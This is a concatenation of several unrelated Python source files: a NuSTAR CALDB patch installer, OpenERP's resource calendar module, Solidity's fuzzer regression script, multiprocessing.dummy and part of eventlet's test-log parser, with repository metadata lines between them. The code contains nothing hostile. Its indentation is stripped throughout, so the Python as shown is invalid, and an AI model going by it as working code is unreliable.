print("Creating {0} directory".format(patchinstalldir))
os.makedirs(patchinstalldir)
#
#create a full version of the existing nustar caldb in the
# $CALDB/data/nustar in the nustar/versions are via rsync:
# cdirs=['bcf','cpf','index', 'caldb.indx']
# for c in cdirs:
# cmd = "rsync -avz " + caldb + "/data/nustar/fpm/" + c + " " + patchinstalldir + "/fpm"
# if os.path.isdir(patchinstalldir+'/fpm/'+c):
# ans = raw_input('\nDirectory '+patchinstalldir+'/fpm/'+c+' Exists. Remove it and re-download (Y/n)? ')
# if ans.lower().strip()[0] == 'y':
# shutil.rmtree(patchinstalldir+'/'+c)
# else:
# cmd = "echo keeping pre-existing directory "+patchinstalldir+'/fpm/'+c
# print (cmd)
# os.system(cmd)
#
# get the patch file
#
host = ftputil.FTPHost(nupatchserver,'anonymous','[email protected]')
patchfiledir = nupatchworkdir+'/'+version.strip()
patchfile = 'NUSTARCALDB_patch'+version.strip()+'.tgz'
print('\nDownloading {0}...'.format(patchfile))
try:
host.download(patchfiledir+'/'+patchfile,patchinstalldir+'/'+patchfile,mode='b') # need mode flag for ftputil<3.0
except TypeError:
host.download(patchfiledir + '/' + patchfile, patchinstalldir + '/' + patchfile) # if mode flag not present (ftputil>=3.0)
#
# untar the file
#
print('\nExtracting {0} to {1}'.format(patchfile, patchinstalldir))
ptf = tarfile.open(patchinstalldir+'/'+patchfile)
ptf.extractall(patchinstalldir)
newfiles = ptf.getnames()
#
# Link the updated version to staging/data/nustar/fpm:
#
#
dst = caldbstage+'/data/nustar/fpm'
if os.path.islink(dst):
os.remove(dst)
print "Creating symbolic link from {0} to {1}".format(patchinstalldir+"/fpm", dst)
try:
os.symlink(patchinstalldir+'/fpm', dst)
except:
print "Problem creating symbolic link to "+dst+"; Returning"
return
#
# check that all files in the cif exist in the new caldb
#
if ck_file_exists:
print ("\nChecking existence of files in the caldb.indx file...")
cif = pyfits.open(caldbstage+'/data/nustar/fpm/caldb.indx')
missing = ck_file_existence(cif, caldb=caldbstage, quiet=True)
if len(missing) > 0:
print "\nThese files are missing from the caldb:"
for f in missing:
print f
#
# create update file in staging/nustar/to_ingest directory
#
update_txt='from: [email protected]\n' \
'Subject: caldb update nustar '+version.strip()+'\n' \
'Date: '+datetime.datetime.now().strftime("%Y-%m-%d %H:%M")+'\n' \
'To: [email protected]\n\n' \
'instrument=fpm\n' \
'caldbindexfile=caldb.indx'+version.strip()+'\n\n' \
'newfile\n'
for f in newfiles: # get file list from patch tarfile
name=f.split('fpm/')[1]
if not 'caldb.indx' in name.strip().lower(): # don't include caldb.indx files in ingest note
update_txt=update_txt+name+"\n"
update_txt=update_txt+'endnewfile\n'
ingestfilename = 'caldb_update_nustar_'+version.strip()+'.txt'
ingestfile = caldbstage+'/data/nustar/to_ingest/'+ingestfilename
print('Creating {0}'.format(ingestfile))
fingest = open(ingestfile,'w')
fingest.write(update_txt)
fingest.close()
#print('\nEdit {0} and enter list of new files from the update e-mail from BG'.format(ingestfile))
#
# make symlink to caldb_update.txt file
#
curdir=os.getcwd()
to_ingestdir = caldbstage+"/data/nustar/to_ingest"
updatefile='caldb_update.txt'
os.chdir(to_ingestdir)
print "Creating symbolic link from {0} to {1} in {2}".format(ingestfilename, updatefile,to_ingestdir)
if os.path.islink(updatefile):
os.remove(updatefile)
try:
os.symlink(ingestfile, updatefile)
except:
print "Problem creating symbolic link to "+updatefile+"; Returning"
return
os.chdir(curdir)
return
if __name__ == "__main__":
#
# for sshfs mounted directories
#
caldb="/fuse/caldb"
stage = '/fuse/caldb_stage'
patch_nustar_caldb('20160606', caldb=caldb, caldbstage=stage, ck_file_exists=False)
| gpl-2.0 | -8,444,047,767,977,949,000 | 39.698198 | 132 | 0.622247 | false |
camptocamp/ngo-addons-backport | addons/resource/resource.py | 35 | 25745 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pytz
from datetime import datetime, timedelta
from dateutil import rrule
import math
from faces import *
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare
from openerp.tools.translate import _
from itertools import groupby
from operator import itemgetter
class resource_calendar(osv.osv):
_name = "resource.calendar"
_description = "Resource Calendar"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'company_id' : fields.many2one('res.company', 'Company', required=False),
'attendance_ids' : fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time'),
'manager' : fields.many2one('res.users', 'Workgroup Manager'),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context)
}
def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None):
"""Calculates the Working Total Hours based on Resource Calendar and
given working day (datetime object).
@param resource_calendar_id: resource.calendar browse record
@param day: datetime object
        @return: the working hours (as float) to be worked on the given day if it is in the attendance_ids of the resource_calendar_id (i.e. if that day is a working day), 0.0 otherwise
"""
res = 0.0
for working_day in resource_calendar_id.attendance_ids:
if (int(working_day.dayofweek) + 1) == day.isoweekday():
res += working_day.hour_to - working_day.hour_from
return res
def _get_leaves(self, cr, uid, id, resource):
"""Private Method to Calculate resource Leaves days
@param id: resource calendar id
        @param resource: resource id for which leaves will be calculated
@return : returns the list of dates, where resource on leave in
resource.calendar.leaves object (e.g.['%Y-%m-%d', '%Y-%m-%d'])
"""
resource_cal_leaves = self.pool.get('resource.calendar.leaves')
dt_leave = []
resource_leave_ids = resource_cal_leaves.search(cr, uid, [('calendar_id','=',id), '|', ('resource_id','=',False), ('resource_id','=',resource)])
#res_leaves = resource_cal_leaves.read(cr, uid, resource_leave_ids, ['date_from', 'date_to'])
res_leaves = resource_cal_leaves.browse(cr, uid, resource_leave_ids)
for leave in res_leaves:
dtf = datetime.strptime(leave.date_from, '%Y-%m-%d %H:%M:%S')
dtt = datetime.strptime(leave.date_to, '%Y-%m-%d %H:%M:%S')
no = dtt - dtf
[dt_leave.append((dtf + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
dt_leave.sort()
return dt_leave
def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False):
"""
        Calculates the working schedule from the supplied date until the
        requested number of working hours is satisfied, based on the resource
        calendar id. If a resource is also given, its leaves are taken into
        account when computing the schedule.
@param dt_from: datetime object, start of working scheduled
@param hours: float, total number working hours needed scheduled from
start date
@param resource : Optional Resource id, if supplied than resource leaves
will also taken into consideration for calculating working
schedule.
@return : List datetime object of working schedule based on supplies
params
"""
if not id:
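            # no working calendar defined: assume 8 working hours per day (24 / 8 = 3)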
td = int(hours)*3
return [(dt_from - timedelta(hours=td), dt_from)]
dt_leave = self._get_leaves(cr, uid, id, resource)
dt_leave.reverse()
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
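        # walk backwards in time, day by day, from dt_from until 'todo' working
        # hours have been collected (maxrecur caps the search at 100 days)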
while float_compare(todo, 0, 4) and maxrecur:
cr.execute("select hour_from,hour_to from resource_calendar_attendance where dayofweek='%s' and calendar_id=%s order by hour_from desc", (dt_from.weekday(),id))
for (hour_from,hour_to) in cr.fetchall():
leave_flag = False
if (hour_from<current_hour) and float_compare(todo, 0, 4):
m = min(hour_to, current_hour)
if (m-hour_from)>todo:
hour_from = m-todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(hour_from)), int((hour_from%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(m)), int((m%1) * 60))
result.append((d1, d2))
current_hour = hour_from
todo -= (m-hour_from)
dt_from -= timedelta(days=1)
current_hour = 24
maxrecur -= 1
result.reverse()
return result
# def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True):
def group(lst, key):
lst.sort(key=itemgetter(key))
grouped = groupby(lst, itemgetter(key))
return dict([(k, [v for v in itr]) for k, itr in grouped])
# END group
cr.execute("select calendar_id, dayofweek, hour_from, hour_to from resource_calendar_attendance order by hour_from")
hour_res = cr.dictfetchall()
hours_by_cal = group(hour_res, 'calendar_id')
results = {}
for d, hours, id in date_and_hours_by_cal:
dt_from = datetime.strptime(d, '%Y-%m-%d %H:%M:%S')
if not id:
td = int(hours)*3
results[(d, hours, id)] = [(dt_from, dt_from + timedelta(hours=td))]
continue
dt_leave = self._get_leaves(cr, uid, id, resource)
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
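            # walk forward, day by day, from dt_from until 'todo' hours are scheduled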
while float_compare(todo, 0, 4) and maxrecur:
for (hour_from,hour_to) in [(item['hour_from'], item['hour_to']) for item in hours_by_cal[id] if item['dayofweek'] == str(dt_from.weekday())]:
leave_flag = False
if (hour_to>current_hour) and float_compare(todo, 0, 4):
m = max(hour_from, current_hour)
if (hour_to-m)>todo:
hour_to = m+todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(m)), minutes=int((m%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(hour_to)), minutes=int((hour_to%1) * 60))
result.append((d1, d2))
current_hour = hour_to
todo -= (hour_to - m)
dt_from += timedelta(days=1)
current_hour = 0
maxrecur -= 1
results[(d, hours, id)] = result
return results
def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
"""Calculates Resource Working Internal Timing Based on Resource Calendar.
@param dt_from: start resource schedule calculation.
@param hours : total number of working hours to be scheduled.
@param resource: optional resource id, If supplied it will take care of
resource leave while scheduling.
@param byday: boolean flag bit enforce day wise scheduling
@return : list of scheduled working timing based on resource calendar.
"""
res = self.interval_get_multi(cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)]
return res
def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource: optional resource id, If given resource leave will be
considered.
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource)
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource_id: optional resource id, If given resource leave will be
considered.
        @param timezone_from_uid: optional uid, if given we will consider
working hours in that user timezone
        @param exclude_leaves: optional, if set to True (default) we will exclude
resource leaves from working hours
@param context: current request context
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
utc_tz = pytz.timezone('UTC')
local_tz = utc_tz
if timezone_from_uid:
users_obj = self.pool.get('res.users')
user_timezone = users_obj.browse(cr, uid, timezone_from_uid, context=context).partner_id.tz
if user_timezone:
try:
local_tz = pytz.timezone(user_timezone)
except pytz.UnknownTimeZoneError:
pass # fallback to UTC as local timezone
def utc_to_local_zone(naive_datetime):
utc_dt = utc_tz.localize(naive_datetime, is_dst=False)
return utc_dt.astimezone(local_tz)
def float_time_convert(float_val):
factor = float_val < 0 and -1 or 1
val = abs(float_val)
return (factor * int(math.floor(val)), int(round((val % 1) * 60)))
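        # Illustrative values (computed from the helper above, not in the original):
        #   float_time_convert(8.5)   == (8, 30)
        #   float_time_convert(-1.25) == (-1, 15)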
# Get slots hours per day
# {day_of_week: [(8, 12), (13, 17), ...], ...}
hours_range_per_weekday = {}
if id:
cr.execute("select dayofweek, hour_from,hour_to from resource_calendar_attendance where calendar_id=%s order by hour_from", (id,))
for weekday, hour_from, hour_to in cr.fetchall():
weekday = int(weekday)
hours_range_per_weekday.setdefault(weekday, [])
hours_range_per_weekday[weekday].append((hour_from, hour_to))
else:
# considering default working hours (Monday -> Friday, 8 -> 12, 13 -> 17)
for weekday in range(5):
hours_range_per_weekday[weekday] = [(8, 12), (13, 17)]
## Interval between dt_from - dt_to
##
## dt_from dt_to
## =============|==================|============
## [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]
##
## [ : start of range
## ] : end of range
##
## case 1: range end before interval start (skip)
## case 2: range overlap interval start (fit start to internal)
## case 3: range within interval
## case 4: range overlap interval end (fit end to interval)
## case 5: range start after interval end (skip)
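        ## Worked example (illustrative values, not from the original code):
        ## with a working range 08:00-12:00 and an interval that starts at
        ## 10:30 the same day and ends after 12:00, case 2 applies:
        ## daytime_start is clipped to 10:30 and the slot contributes
        ## 1.5 hours (12:00 - 10:30) to hours_timedelta.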
interval_start = utc_to_local_zone(dt_from)
interval_end = utc_to_local_zone(dt_to)
hours_timedelta = timedelta()
# Get leaves for requested resource
dt_leaves = set([])
if exclude_leaves and id:
dt_leaves = set(self._get_leaves(cr, uid, id, resource=resource_id))
for day in rrule.rrule(rrule.DAILY, dtstart=interval_start,
until=interval_end+timedelta(days=1),
byweekday=hours_range_per_weekday.keys()):
if exclude_leaves and day.strftime('%Y-%m-%d') in dt_leaves:
                # XXX: further improve leave management to allow for partial-day leaves
continue
for (range_from, range_to) in hours_range_per_weekday.get(day.weekday(), []):
range_from_hour, range_from_min = float_time_convert(range_from)
range_to_hour, range_to_min = float_time_convert(range_to)
daytime_start = local_tz.localize(day.replace(hour=range_from_hour, minute=range_from_min, second=0, tzinfo=None))
daytime_end = local_tz.localize(day.replace(hour=range_to_hour, minute=range_to_min, second=0, tzinfo=None))
# case 1 & 5: time range out of interval
if daytime_end < interval_start or daytime_start > interval_end:
continue
# case 2 & 4: adjust start, end to fit within interval
daytime_start = max(daytime_start, interval_start)
daytime_end = min(daytime_end, interval_end)
# case 2+, 4+, 3
hours_timedelta += (daytime_end - daytime_start)
# return timedelta converted to hours
return (hours_timedelta.days * 24.0 + hours_timedelta.seconds / 3600.0)
resource_calendar()
class resource_calendar_attendance(osv.osv):
_name = "resource.calendar.attendance"
_description = "Work Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True),
'date_from' : fields.date('Starting Date'),
'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True),
'hour_to' : fields.float("Work to", required=True),
'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True),
}
_order = 'dayofweek, hour_from'
_defaults = {
'dayofweek' : '0'
}
resource_calendar_attendance()
def hours_time_string(hours):
""" convert a number of hours (float) into a string with format '%H:%M' """
minutes = int(round(hours * 60))
return "%02d:%02d" % divmod(minutes, 60)
class resource_resource(osv.osv):
_name = "resource.resource"
_description = "Resource Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'code': fields.char('Code', size=16),
'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."),
'company_id' : fields.many2one('res.company', 'Company'),
'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True),
'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'),
        'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depicts the efficiency of the resource to complete tasks. e.g. a resource put alone on a phase of 5 days with 5 tasks assigned to him will show a load of 100% for this phase by default, but if we put an efficiency of 200%, then his load will only be 50%."),
'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"),
}
_defaults = {
'resource_type' : 'user',
'time_efficiency' : 1,
'active' : True,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if not default.get('name', False):
default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name))
return super(resource_resource, self).copy(cr, uid, id, default, context)
def generate_resources(self, cr, uid, user_ids, calendar_id, context=None):
"""
        Return a dictionary of resource details (name, vacation days, efficiency), keyed by user id, for the resources allocated to the phase.
"""
resource_objs = {}
user_pool = self.pool.get('res.users')
for user in user_pool.browse(cr, uid, user_ids, context=context):
resource_objs[user.id] = {
'name' : user.name,
'vacation': [],
'efficiency': 1.0,
}
resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context)
if resource_ids:
for resource in self.browse(cr, uid, resource_ids, context=context):
resource_objs[user.id]['efficiency'] = resource.time_efficiency
resource_cal = resource.calendar_id.id
if resource_cal:
leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context)
resource_objs[user.id]['vacation'] += list(leaves)
return resource_objs
def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None):
"""
Compute the vacation from the working calendar of the resource.
@param calendar_id : working calendar of the project
@param resource_id : resource working on phase/task
@param resource_calendar : working calendar of the resource
"""
resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves')
leave_list = []
if resource_id:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id),
('calendar_id', '=', resource_calendar),
('resource_id', '=', resource_id)
], context=context)
else:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id),
('resource_id', '=', False)
], context=context)
leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context)
for i in range(len(leaves)):
dt_start = datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S')
dt_end = datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S')
no = dt_end - dt_start
[leave_list.append((dt_start + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
leave_list.sort()
return leave_list
def compute_working_calendar(self, cr, uid, calendar_id=False, context=None):
"""
        Convert the working calendar from the OpenERP format into the format expected by the 'Faces' scheduling library.
@param calendar_id : working calendar of the project
"""
if not calendar_id:
            # Calendar is not specified: fall back to the default working week
            # (Monday to Friday, 8:00-12:00 and 13:00-17:00)
return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'),
('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')]
resource_attendance_pool = self.pool.get('resource.calendar.attendance')
time_range = "8:00-8:00"
non_working = ""
week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"}
wk_days = {}
wk_time = {}
wktime_list = []
wktime_cal = []
week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context)
weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context)
# Convert time formats into appropriate format required
# and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')]
for week in weeks:
res_str = ""
day = None
if week_days.get(week['dayofweek'],False):
day = week_days[week['dayofweek']]
wk_days[week['dayofweek']] = week_days[week['dayofweek']]
else:
raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!'))
hour_from_str = hours_time_string(week['hour_from'])
hour_to_str = hours_time_string(week['hour_to'])
res_str = hour_from_str + '-' + hour_to_str
wktime_list.append((day, res_str))
# Convert into format like [('mon', '8:00-12:00', '13:00-18:00')]
for item in wktime_list:
if wk_time.has_key(item[0]):
wk_time[item[0]].append(item[1])
else:
wk_time[item[0]] = [item[0]]
wk_time[item[0]].append(item[1])
for k,v in wk_time.items():
wktime_cal.append(tuple(v))
# Add for the non-working days like: [('sat, sun', '8:00-8:00')]
for k, v in wk_days.items():
if week_days.has_key(k):
week_days.pop(k)
for v in week_days.itervalues():
non_working += v + ','
if non_working:
wktime_cal.append((non_working[:-1], time_range))
return wktime_cal
resource_resource()
class resource_calendar_leaves(osv.osv):
_name = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'name' : fields.char("Name", size=64),
'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True),
'calendar_id' : fields.many2one("resource.calendar", "Working Time"),
'date_from' : fields.datetime('Start Date', required=True),
'date_to' : fields.datetime('End Date', required=True),
'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"),
}
def check_dates(self, cr, uid, ids, context=None):
leave = self.read(cr, uid, ids[0], ['date_from', 'date_to'])
if leave['date_from'] and leave['date_to']:
if leave['date_from'] > leave['date_to']:
return False
return True
_constraints = [
        (check_dates, 'Error! Leave start-date must be lower than leave end-date.', ['date_from', 'date_to'])
]
def onchange_resource(self, cr, uid, ids, resource, context=None):
result = {}
if resource:
resource_pool = self.pool.get('resource.resource')
result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id
return {'value': result}
return {'value': {'calendar_id': []}}
resource_calendar_leaves()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -6,097,168,510,317,472,000 | 49.087549 | 356 | 0.564614 | false |
ethereum/solidity | scripts/regressions.py | 1 | 4285 | #!/usr/bin/env python3
from argparse import ArgumentParser
import sys
import os
import subprocess
import re
import glob
import threading
import time
DESCRIPTION = """Regressor is a tool to run regression tests in a CI env."""
class PrintDotsThread(object):
"""Prints a dot every "interval" (default is 300) seconds"""
def __init__(self, interval=300):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
""" Runs until the main Python thread exits. """
## Print a newline at the very beginning.
print("")
while True:
# Print dot
print(".")
time.sleep(self.interval)
class regressor():
_re_sanitizer_log = re.compile(r"""ERROR: (libFuzzer|UndefinedBehaviorSanitizer)""")
def __init__(self, description, args):
self._description = description
self._args = self.parseCmdLine(description, args)
self._repo_root = os.path.dirname(sys.path[0])
self._fuzzer_path = os.path.join(self._repo_root,
"build/test/tools/ossfuzz")
self._logpath = os.path.join(self._repo_root, "test_results")
def parseCmdLine(self, description, args):
argParser = ArgumentParser(description)
argParser.add_argument('-o', '--out-dir', required=True, type=str,
help="""Directory where test results will be written""")
return argParser.parse_args(args)
@staticmethod
def run_cmd(command, logfile=None, env=None):
"""
Args:
command (str): command to run
logfile (str): log file name
env (dict): dictionary holding key-value pairs for bash environment
variables
Returns:
int: The exit status of the command. Exit status codes are:
0 -> Success
1-255 -> Failure
"""
if not logfile:
logfile = os.devnull
if not env:
env = os.environ.copy()
with open(logfile, 'w') as logfh:
with subprocess.Popen(command, shell=True, executable='/bin/bash',
env=env, stdout=logfh,
stderr=subprocess.STDOUT) as proc:
ret = proc.wait()
logfh.close()
return ret
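    # Illustrative call (assumed command and log path, not from the original script):
    #   ret = self.run_cmd("echo ok", logfile="/tmp/fuzz.log")  # ret == 0 on success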
def process_log(self, logfile):
"""
Args:
logfile (str): log file name
Returns:
bool: Test status.
True -> Success
False -> Failure
"""
## Log may contain non ASCII characters, so we simply stringify them
## since they don't matter for regular expression matching
with open(logfile, 'rb') as f:
rawtext = str(f.read())
return not re.search(self._re_sanitizer_log, rawtext)
def run(self):
"""
Returns:
bool: Test status.
True -> All tests succeeded
False -> At least one test failed
"""
testStatus = []
for fuzzer in glob.iglob("{}/*_ossfuzz".format(self._fuzzer_path)):
basename = os.path.basename(fuzzer)
logfile = os.path.join(self._logpath, "{}.log".format(basename))
corpus_dir = "/tmp/solidity-fuzzing-corpus/{0}_seed_corpus" \
.format(basename)
cmd = "find {0} -type f | xargs -n1 sh -c '{1} $0 || exit 255'".format(corpus_dir, fuzzer)
self.run_cmd(cmd, logfile=logfile)
ret = self.process_log(logfile)
if not ret:
print(
"\t[-] libFuzzer reported failure for {0}. "
"Failure logged to test_results".format(
basename))
testStatus.append(False)
else:
print("\t[+] {0} passed regression tests.".format(basename))
testStatus.append(True)
return all(testStatus)
if __name__ == '__main__':
dotprinter = PrintDotsThread()
tool = regressor(DESCRIPTION, sys.argv[1:])
sys.exit(not tool.run())
| gpl-3.0 | -8,180,785,861,071,993,000 | 32.740157 | 102 | 0.538156 | false |
zhjunlang/kbengine | kbe/src/lib/python/Lib/multiprocessing/dummy/__init__.py | 79 | 2881 | #
# Support for the API of the multiprocessing package using threads
#
# multiprocessing/dummy/__init__.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [
'Process', 'current_process', 'active_children', 'freeze_support',
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition',
'Event', 'Barrier', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue'
]
#
# Imports
#
import threading
import sys
import weakref
import array
from .connection import Pipe
from threading import Lock, RLock, Semaphore, BoundedSemaphore
from threading import Event, Condition, Barrier
from queue import Queue
#
#
#
class DummyProcess(threading.Thread):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
threading.Thread.__init__(self, group, target, name, args, kwargs)
self._pid = None
self._children = weakref.WeakKeyDictionary()
self._start_called = False
self._parent = current_process()
def start(self):
assert self._parent is current_process()
self._start_called = True
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
threading.Thread.start(self)
@property
def exitcode(self):
if self._start_called and not self.is_alive():
return 0
else:
return None
#
#
#
Process = DummyProcess
current_process = threading.current_thread
current_process()._children = weakref.WeakKeyDictionary()
def active_children():
children = current_process()._children
for p in list(children):
if not p.is_alive():
children.pop(p, None)
return list(children)
def freeze_support():
pass
#
#
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
dict = dict
list = list
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def _get(self):
return self._value
def _set(self, value):
self._value = value
value = property(_get, _set)
def __repr__(self):
return '<%s(%r, %r)>'%(type(self).__name__,self._typecode,self._value)
def Manager():
return sys.modules[__name__]
def shutdown():
pass
def Pool(processes=None, initializer=None, initargs=()):
from ..pool import ThreadPool
return ThreadPool(processes, initializer, initargs)
JoinableQueue = Queue
| lgpl-3.0 | -4,967,700,055,803,868,000 | 23.210084 | 79 | 0.622353 | false |
2013Commons/HUE-SHARK | desktop/core/ext-py/eventlet-0.9.14/tests/parse_results.py | 7 | 3671 | import sys
import os
import traceback
try:
import sqlite3
except ImportError:
import pysqlite2.dbapi2 as sqlite3
import re
import glob
def parse_stdout(s):
argv = re.search('^===ARGV=(.*?)$', s, re.M).group(1)
argv = argv.split()
testname = argv[-1]
del argv[-1]
hub = None
reactor = None
while argv:
if argv[0]=='--hub':
hub = argv[1]
del argv[0]
del argv[0]
elif argv[0]=='--reactor':
reactor = argv[1]
del argv[0]
del argv[0]
else:
del argv[0]
if reactor is not None:
hub += '/%s' % reactor
return testname, hub
unittest_delim = '----------------------------------------------------------------------'
def parse_unittest_output(s):
s = s[s.rindex(unittest_delim)+len(unittest_delim):]
num = int(re.search('^Ran (\d+) test.*?$', s, re.M).group(1))
ok = re.search('^OK$', s, re.M)
error, fail, timeout = 0, 0, 0
failed_match = re.search(r'^FAILED \((?:failures=(?P<f>\d+))?,? ?(?:errors=(?P<e>\d+))?\)$', s, re.M)
ok_match = re.search('^OK$', s, re.M)
if failed_match:
assert not ok_match, (ok_match, s)
fail = failed_match.group('f')
error = failed_match.group('e')
fail = int(fail or '0')
error = int(error or '0')
else:
assert ok_match, repr(s)
timeout_match = re.search('^===disabled because of timeout: (\d+)$', s, re.M)
if timeout_match:
timeout = int(timeout_match.group(1))
return num, error, fail, timeout
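# Illustrative example: for output whose tail after the unittest separator contains
#   "Ran 12 tests in 0.500s" and "FAILED (failures=1, errors=2)",
# parse_unittest_output returns (12, 2, 1, 0).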
def main(db):
c = sqlite3.connect(db)
c.execute('''create table if not exists parsed_command_record
(id integer not null unique,
testname text,
hub text,
runs integer,
errors integer,
fails integer,
timeouts integer,
error_names text,
fail_names text,
timeout_names text)''')
c.commit()
parse_error = 0
SQL = ('select command_record.id, command, stdout, exitcode from command_record '
'where not exists (select * from parsed_command_record where '
'parsed_command_record.id=command_record.id)')
for row in c.execute(SQL).fetchall():
id, command, stdout, exitcode = row
try:
testname, hub = parse_stdout(stdout)
if unittest_delim in stdout:
runs, errors, fails, timeouts = parse_unittest_output(stdout)
else:
if exitcode == 0:
runs, errors, fails, timeouts = 1,0,0,0
if exitcode == 7:
runs, errors, fails, timeouts = 0,0,0,1
elif exitcode:
runs, errors, fails, timeouts = 1,1,0,0
except Exception:
parse_error += 1
sys.stderr.write('Failed to parse id=%s\n' % id)
print repr(stdout)
traceback.print_exc()
else:
